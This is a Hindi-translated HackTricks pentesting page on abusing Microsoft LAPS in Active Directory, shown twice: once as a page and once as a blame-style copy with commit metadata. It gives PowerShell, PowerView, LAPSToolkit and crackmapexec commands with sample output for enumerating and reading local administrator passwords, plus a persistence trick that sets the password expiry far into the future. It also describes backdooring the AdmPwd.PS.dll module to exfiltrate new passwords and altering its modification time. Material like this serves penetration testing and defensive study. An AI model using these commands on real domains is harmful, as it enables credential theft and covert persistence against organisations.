hacktricks/windows-hardening/active-directory-methodology/laps.md

# LAPS

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।

</details>

## मूल जानकारी

**LAPS** आपको डोमेन-जुड़े कंप्यूटरों पर **स्थानीय व्यवस्थापक पासवर्ड** (जो **यादृच्छिक**, अद्वितीय, और **नियमित रूप से बदलता है**) प्रबंधित करने की अनुमति देता है। ये पासवर्ड सक्रिय निर्देशिका में केंद्रीय रूप से संग्रहीत होते हैं और एसीएल का उपयोग करके अधिकृत उपयोगकर्ताओं को प्रतिबंधित किया जाता है। पासवर्ड क्लाइंट से सर्वर तक Kerberos v5 और AES का उपयोग करके सुरक्षित रूप से हैं।

LAPS का उपयोग करते समय, डोमेन के **कंप्यूटर** ऑब्जेक्ट्स में **2 नए विशेषताएँ** प्रकट होती हैं: **`ms-mcs-AdmPwd`** और **`ms-mcs-AdmPwdExpirationTime`**। ये विशेषताएँ **सादा-पाठ व्यवस्थापक पासवर्ड और समाप्ति समय** समेत होती हैं। फिर, डोमेन वातावरण में, यह महत्वपूर्ण हो सकता है कि जांचें **कौन-कौन से उपयोगकर्ता** इन विशेषताओं को पढ़ सकते हैं।

### सक्रिय है या नहीं
```bash
reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled

dir "C:\Program Files\LAPS\CSE"
# Check if that folder exists and contains AdmPwd.dll

# Find GPOs that have "LAPS" or some other descriptive term in the name
Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl

# Search computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null (any Domain User can read this property)
Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs-admpwdexpirationtime" -ne $null } | select DnsHostname
```
### LAPS पासवर्ड एक्सेस

आप **`\\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol`** से **रॉ LAPS नीति डाउनलोड** कर सकते हैं और फिर [**GPRegistryPolicyParser**](https://github.com/PowerShell/GPRegistryPolicyParser) पैकेज से **`Parse-PolFile`** का उपयोग करके इस फ़ाइल को मानव-पठनीय स्वरूप में रूपांतरित किया जा सकता है।

इसके अतिरिक्त, यदि वे किसी मशीन पर स्थापित हैं जिसका हमारे पास पहुंच है, तो **नेटिव LAPS PowerShell cmdlets** का उपयोग किया जा सकता है:
```powershell
Get-Command *AdmPwd*

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Cmdlet          Find-AdmPwdExtendedRights                          5.0.0.0    AdmPwd.PS
Cmdlet          Get-AdmPwdPassword                                 5.0.0.0    AdmPwd.PS
Cmdlet          Reset-AdmPwdPassword                               5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdAuditing                                 5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdComputerSelfPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdReadPasswordPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdResetPasswordPermission                  5.0.0.0    AdmPwd.PS
Cmdlet          Update-AdmPwdADSchema                              5.0.0.0    AdmPwd.PS

# List who can read LAPS password of the given OU
Find-AdmPwdExtendedRights -Identity Workstations | fl

# Read the password
Get-AdmPwdPassword -ComputerName wkstn-2 | fl
```
**PowerView** का उपयोग किया जा सकता है ताकि पता लगा सके **कौन पासवर्ड को पढ़ सकता है और इसे पढ़ सकता है**:
```powershell
# Find the principals that have ReadPropery on ms-Mcs-AdmPwd
Get-AdmPwdPassword -ComputerName wkstn-2 | fl

# Read the password
Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd
```
### LAPSToolkit

[LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit) एलएपीएस की जांच को कई कार्यों के साथ सुविधाजनक बनाता है।
इनमें से एक है **`ExtendedRights`** का **समापन करना** **लैप्स सक्षम सभी कंप्यूटरों** के लिए। यह दिखाएगा **समूह** विशेष रूप से **लैप्स पासवर्ड पढ़ने के लिए सम्मत किए गए**, जो अक्सर सुरक्षित समूहों में उपयोगकर्ता होते हैं।
एक **खाता** जो एक कंप्यूटर को एक डोमेन में शामिल करता है, उस होस्ट पर `सभी विस्तारित अधिकार` प्राप्त करता है, और यह अधिकार **खाते** को **पासवर्ड पढ़ने** की क्षमता देता है। सूचीकरण एक उपयोगकर्ता खाता दिखा सकता है जो होस्ट पर लैप्स पासवर्ड पढ़ सकता है। यह हमें मदद कर सकता है **निश्चित एडी उपयोगकर्ताओं** को लक्षित करने में जो लैप्स पासवर्ड पढ़ सकते हैं।
```powershell
# Get groups that can read passwords
Find-LAPSDelegatedGroups

OrgUnit                                           Delegated Groups
-------                                           ----------------
OU=Servers,DC=DOMAIN_NAME,DC=LOCAL                DOMAIN_NAME\Domain Admins
OU=Workstations,DC=DOMAIN_NAME,DC=LOCAL           DOMAIN_NAME\LAPS Admin

# Checks the rights on each computer with LAPS enabled for any groups
# with read access and users with "All Extended Rights"
Find-AdmPwdExtendedRights
ComputerName                Identity                    Reason
------------                --------                    ------
MSQL01.DOMAIN_NAME.LOCAL    DOMAIN_NAME\Domain Admins   Delegated
MSQL01.DOMAIN_NAME.LOCAL    DOMAIN_NAME\LAPS Admins     Delegated

# Get computers with LAPS enabled, expirations time and the password (if you have access)
Get-LAPSComputers
ComputerName                Password       Expiration
------------                --------       ----------
DC01.DOMAIN_NAME.LOCAL      j&gR+A(s976Rf% 12/10/2022 13:24:41
```
## **Crackmapexec के साथ LAPS पासवर्ड डंपिंग**
यदि powershell तक पहुंच नहीं है, तो आप इस विशेषाधिकार का दुरुपयोग LDAP के माध्यम से दूरस्थ रूप से कर सकते हैं।
```
crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps
```
## **LAPS Persistence**

### **समाप्ति तिथि**

एक बार एडमिन बनने के बाद, यह संभव है कि आप **पासवर्ड** प्राप्त कर सकें और एक मशीन को **पासवर्ड** अपडेट करने से **रोकने** के लिए **समाप्ति तिथि को भविष्य में** सेट करके।
```powershell
# Get expiration time
Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime

# Change expiration time
## It's needed SYSTEM on the computer
Set-DomainObject -Identity wkstn-2 -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}
```
{% hint style="warning" %}
अगर **एडमिन** **`Reset-AdmPwdPassword`** cmdlet का उपयोग करता है; या अगर LAPS GPO में **जो नीति द्वारा आवश्यक समय से अधिक पासवर्ड समाप्ति की अनुमति नहीं है** तो पासवर्ड फिर से रीसेट हो जाएगा।
{% endhint %}

### बैकडोर

LAPS के लिए मूल स्रोत कोड [यहाँ](https://github.com/GreyCorbel/admpwd) पाया जा सकता है, इसलिए कोड में एक बैकडोर डालना संभव है (उदाहरण के लिए `Main/AdmPwd.PS/Main.cs` में `Get-AdmPwdPassword` विधि के अंदर) जो किसी प्रकार से **नए पासवर्डों को बाहर ले जाए या किसी जगह पर संग्रहित करे**।

फिर, नया `AdmPwd.PS.dll` को कंपाइल करें और इसे मशीन में `C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll` में अपलोड करें (और संशोधन समय बदलें)।

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **PEASS के नवीनतम संस्करण को देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।

</details>
GitBook: [#3402] No subject 2022-08-17 05:31:13 +00:00			`# LAPS`

			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
GitBook: [#3402] No subject 2022-08-17 05:31:13 +00:00
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 05:45:20 +00:00			* क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप चाहते हैं कि आपकी कंपनी को हैकट्रिक्स में विज्ञापित किया जाए? या क्या आप PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं? [सब्सक्रिप्शन प्लान्स](https://github.com/sponsors/carlospolop) की जांच करें!
			`* [द पीएस फैमिली](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [एनएफटी](https://opensea.io/collection/the-peass-family) संग्रह।`
			`* [आधिकारिक PEASS और हैकट्रिक्स स्वैग](https://peass.creator-spring.com) प्राप्त करें।`
			`* शामिल हों [💬](https://emojipedia.org/speech-balloon/) [डिस्कॉर्ड समूह](https://discord.gg/hRep4RUj7f) या [टेलीग्राम समूह](https://t.me/peass) या मुझे Twitter 🐦[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके।`
GitBook: [#3402] No subject 2022-08-17 05:31:13 +00:00
			`</details>`

Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 05:45:20 +00:00			`## मूल जानकारी`
GitBook: [#3402] No subject 2022-08-17 05:31:13 +00:00
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 05:45:20 +00:00			LAPS आपको डोमेन-जुड़े कंप्यूटरों पर स्थानीय व्यवस्थापक पासवर्ड (जो यादृच्छिक, अद्वितीय, और नियमित रूप से बदलता है) प्रबंधित करने की अनुमति देता है। ये पासवर्ड सक्रिय निर्देशिका में केंद्रीय रूप से संग्रहीत होते हैं और एसीएल का उपयोग करके अधिकृत उपयोगकर्ताओं को प्रतिबंधित किया जाता है। पासवर्ड क्लाइंट से सर्वर तक Kerberos v5 और AES का उपयोग करके सुरक्षित रूप से हैं।
GitBook: [#3402] No subject 2022-08-17 05:31:13 +00:00
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 05:45:20 +00:00			LAPS का उपयोग करते समय, डोमेन के कंप्यूटर ऑब्जेक्ट्स में 2 नए विशेषताएँ प्रकट होती हैं: `ms-mcs-AdmPwd` और `ms-mcs-AdmPwdExpirationTime`। ये विशेषताएँ सादा-पाठ व्यवस्थापक पासवर्ड और समाप्ति समय समेत होती हैं। फिर, डोमेन वातावरण में, यह महत्वपूर्ण हो सकता है कि जांचें कौन-कौन से उपयोगकर्ता इन विशेषताओं को पढ़ सकते हैं।
GitBook: [#3402] No subject 2022-08-17 05:31:13 +00:00
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 05:45:20 +00:00			`### सक्रिय है या नहीं`
GitBook: [#3402] No subject 2022-08-17 05:31:13 +00:00			```bash
			`reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled`

			`dir "C:\Program Files\LAPS\CSE"`
			`# Check if that folder exists and contains AdmPwd.dll`

			`# Find GPOs that have "LAPS" or some other descriptive term in the name`
			`Get-DomainGPO \| ? { $_.DisplayName -like "laps" } \| select DisplayName, Name, GPCFileSysPath \| fl`

			`# Search computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null (any Domain User can read this property)`
			`Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" \| ? { $_."ms-mcs-admpwdexpirationtime" -ne $null } \| select DnsHostname`
			```
Translated to Hindi 2023-11-06 08:38:02 +00:00			`### LAPS पासवर्ड एक्सेस`
GitBook: [#3402] No subject 2022-08-17 05:31:13 +00:00
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 05:45:20 +00:00			आप `\\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol` से रॉ LAPS नीति डाउनलोड कर सकते हैं और फिर [GPRegistryPolicyParser](https://github.com/PowerShell/GPRegistryPolicyParser) पैकेज से `Parse-PolFile` का उपयोग करके इस फ़ाइल को मानव-पठनीय स्वरूप में रूपांतरित किया जा सकता है।
GitBook: [#3402] No subject 2022-08-17 05:31:13 +00:00
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 05:45:20 +00:00			`इसके अतिरिक्त, यदि वे किसी मशीन पर स्थापित हैं जिसका हमारे पास पहुंच है, तो नेटिव LAPS PowerShell cmdlets का उपयोग किया जा सकता है:`
GitBook: [#3402] No subject 2022-08-17 05:31:13 +00:00			```powershell
			`Get-Command AdmPwd`

			`CommandType Name Version Source`
			`----------- ---- ------- ------`
			`Cmdlet Find-AdmPwdExtendedRights 5.0.0.0 AdmPwd.PS`
			`Cmdlet Get-AdmPwdPassword 5.0.0.0 AdmPwd.PS`
			`Cmdlet Reset-AdmPwdPassword 5.0.0.0 AdmPwd.PS`
			`Cmdlet Set-AdmPwdAuditing 5.0.0.0 AdmPwd.PS`
			`Cmdlet Set-AdmPwdComputerSelfPermission 5.0.0.0 AdmPwd.PS`
			`Cmdlet Set-AdmPwdReadPasswordPermission 5.0.0.0 AdmPwd.PS`
			`Cmdlet Set-AdmPwdResetPasswordPermission 5.0.0.0 AdmPwd.PS`
			`Cmdlet Update-AdmPwdADSchema 5.0.0.0 AdmPwd.PS`

			`# List who can read LAPS password of the given OU`
			`Find-AdmPwdExtendedRights -Identity Workstations \| fl`

			`# Read the password`
			`Get-AdmPwdPassword -ComputerName wkstn-2 \| fl`
			```
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 05:45:20 +00:00			`PowerView का उपयोग किया जा सकता है ताकि पता लगा सके कौन पासवर्ड को पढ़ सकता है और इसे पढ़ सकता है:`
GitBook: [#3402] No subject 2022-08-17 05:31:13 +00:00			```powershell
			`# Find the principals that have ReadPropery on ms-Mcs-AdmPwd`
			`Get-AdmPwdPassword -ComputerName wkstn-2 \| fl`

			`# Read the password`
			`Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd`
			```
GitBook: [#3568] No subject 2022-10-05 21:51:12 +00:00			`### LAPSToolkit`

Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 05:45:20 +00:00			`[LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit) एलएपीएस की जांच को कई कार्यों के साथ सुविधाजनक बनाता है।`
			इनमें से एक है `ExtendedRights` का समापन करना लैप्स सक्षम सभी कंप्यूटरों के लिए। यह दिखाएगा समूह विशेष रूप से लैप्स पासवर्ड पढ़ने के लिए सम्मत किए गए, जो अक्सर सुरक्षित समूहों में उपयोगकर्ता होते हैं।
			एक खाता जो एक कंप्यूटर को एक डोमेन में शामिल करता है, उस होस्ट पर `सभी विस्तारित अधिकार` प्राप्त करता है, और यह अधिकार खाते को पासवर्ड पढ़ने की क्षमता देता है। सूचीकरण एक उपयोगकर्ता खाता दिखा सकता है जो होस्ट पर लैप्स पासवर्ड पढ़ सकता है। यह हमें मदद कर सकता है निश्चित एडी उपयोगकर्ताओं को लक्षित करने में जो लैप्स पासवर्ड पढ़ सकते हैं।
GitBook: [#3568] No subject 2022-10-05 21:51:12 +00:00			```powershell
			`# Get groups that can read passwords`
			`Find-LAPSDelegatedGroups`

			`OrgUnit Delegated Groups`
			`------- ----------------`
			`OU=Servers,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\Domain Admins`
			`OU=Workstations,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\LAPS Admin`

			`# Checks the rights on each computer with LAPS enabled for any groups`
			`# with read access and users with "All Extended Rights"`
			`Find-AdmPwdExtendedRights`
			`ComputerName Identity Reason`
			`------------ -------- ------`
			`MSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\Domain Admins Delegated`
			`MSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\LAPS Admins Delegated`

			`# Get computers with LAPS enabled, expirations time and the password (if you have access)`
			`Get-LAPSComputers`
			`ComputerName Password Expiration`
			`------------ -------- ----------`
			`DC01.DOMAIN_NAME.LOCAL j&gR+A(s976Rf% 12/10/2022 13:24:41`
			```
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 05:45:20 +00:00			`## Crackmapexec के साथ LAPS पासवर्ड डंपिंग`
			`यदि powershell तक पहुंच नहीं है, तो आप इस विशेषाधिकार का दुरुपयोग LDAP के माध्यम से दूरस्थ रूप से कर सकते हैं।`
Update laps.md fixed typo 2023-06-11 16:48:40 +00:00			```
			`crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps`
			```
GitBook: [#3402] No subject 2022-08-17 05:31:13 +00:00			`## LAPS Persistence`

Translated to Hindi 2023-11-06 08:38:02 +00:00			`### समाप्ति तिथि`
GitBook: [#3402] No subject 2022-08-17 05:31:13 +00:00
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 05:45:20 +00:00			`एक बार एडमिन बनने के बाद, यह संभव है कि आप पासवर्ड प्राप्त कर सकें और एक मशीन को पासवर्ड अपडेट करने से रोकने के लिए समाप्ति तिथि को भविष्य में सेट करके।`
GitBook: [#3402] No subject 2022-08-17 05:31:13 +00:00			```powershell
			`# Get expiration time`
			`Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime`

			`# Change expiration time`
			`## It's needed SYSTEM on the computer`
			`Set-DomainObject -Identity wkstn-2 -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}`
			```
			`{% hint style="warning" %}`
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 05:45:20 +00:00			अगर एडमिन `Reset-AdmPwdPassword` cmdlet का उपयोग करता है; या अगर LAPS GPO में जो नीति द्वारा आवश्यक समय से अधिक पासवर्ड समाप्ति की अनुमति नहीं है तो पासवर्ड फिर से रीसेट हो जाएगा।
GitBook: [#3402] No subject 2022-08-17 05:31:13 +00:00			`{% endhint %}`

Translated to Hindi 2023-11-06 08:38:02 +00:00			`### बैकडोर`
GitBook: [#3402] No subject 2022-08-17 05:31:13 +00:00
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 05:45:20 +00:00			LAPS के लिए मूल स्रोत कोड [यहाँ](https://github.com/GreyCorbel/admpwd) पाया जा सकता है, इसलिए कोड में एक बैकडोर डालना संभव है (उदाहरण के लिए `Main/AdmPwd.PS/Main.cs` में `Get-AdmPwdPassword` विधि के अंदर) जो किसी प्रकार से नए पासवर्डों को बाहर ले जाए या किसी जगह पर संग्रहित करे।
GitBook: [#3402] No subject 2022-08-17 05:31:13 +00:00
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 05:45:20 +00:00			फिर, नया `AdmPwd.PS.dll` को कंपाइल करें और इसे मशीन में `C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll` में अपलोड करें (और संशोधन समय बदलें)।
GitBook: [#3402] No subject 2022-08-17 05:31:13 +00:00
			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
GitBook: [#3402] No subject 2022-08-17 05:31:13 +00:00
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 05:45:20 +00:00			* क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप चाहते हैं कि आपकी कंपनी को हैकट्रिक्स में विज्ञापित किया जाए? या क्या आप PEASS के नवीनतम संस्करण को देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं? [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop) की जाँच करें!
			`* [The PEASS Family](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [NFTs](https://opensea.io/collection/the-peass-family) संग्रह।`
			`* [आधिकारिक PEASS & HackTricks स्वैग](https://peass.creator-spring.com) प्राप्त करें।`
			`* शामिल हों [💬](https://emojipedia.org/speech-balloon/) [डिस्कॉर्ड समूह](https://discord.gg/hRep4RUj7f) या [टेलीग्राम समूह](https://t.me/peass) या मुझे ट्विटर पर 🐦[@carlospolopm](https://twitter.com/hacktricks_live) का अनुसरण करें।`
			`* हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके।`
GitBook: [#3402] No subject 2022-08-17 05:31:13 +00:00
			`</details>`